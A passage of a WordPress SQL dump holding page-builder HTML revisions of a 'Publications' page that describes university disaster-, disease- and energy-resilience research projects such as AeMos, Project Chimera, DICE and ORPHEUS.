</div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\r\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\r\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\r\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\r\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\r\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\r\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\r\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">The DICE Data Repository </h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\r\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\r\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\r\n                      <br>\r\n                    </p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\r\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Orpheus</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\r\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\r\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\r\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\r\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\r\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\r\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\r\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\r\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\r\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>','Publications','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:18:14','2023-09-29 14:18:14','',126,'https://gsudice.dataconn.net/?p=1425',0,'revision','',0),(1426,1,'2023-09-29 11:36:36','2023-09-29 14:19:10',' ','','','publish','closed','closed','','1426','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',0,'https://gsudice.dataconn.net/?p=1426',2,'nav_menu_item','',0),(1427,1,'2023-09-29 10:19:53','2023-09-29 14:19:53','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\r\n  <!---->\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-339 style-local-126-c2 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-340 style-local-126-c3 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-341-outer style-local-126-c4-outer\">\r\n            <div data-colibri-id=\"126-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-341 style-local-126-c4 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c5\" class=\"h-global-transition-all h-heading style-342 style-local-126-c5 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-342 style-local-126-c5\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">AeMos: An Early Warning Systems for Aedes Mosquito Prediction</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c6\" class=\"h-text h-text-component style-344 style-local-126-c6 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that\r\n                      are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts\r\n                      of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-345-outer style-local-126-c7-outer\">\r\n            <div data-colibri-id=\"126-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-345 style-local-126-c7 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\r\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\r\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, and hybrid is similar to our approach to\r\n                      this research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\r\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\r\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\r\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\r\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\r\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\r\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\r\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\r\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\r\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\r\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">The DICE Data Repository </h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\r\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\r\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\r\n                      <br>\r\n                    </p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\r\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Orpheus</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\r\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\r\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\r\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-fluid-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\r\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container 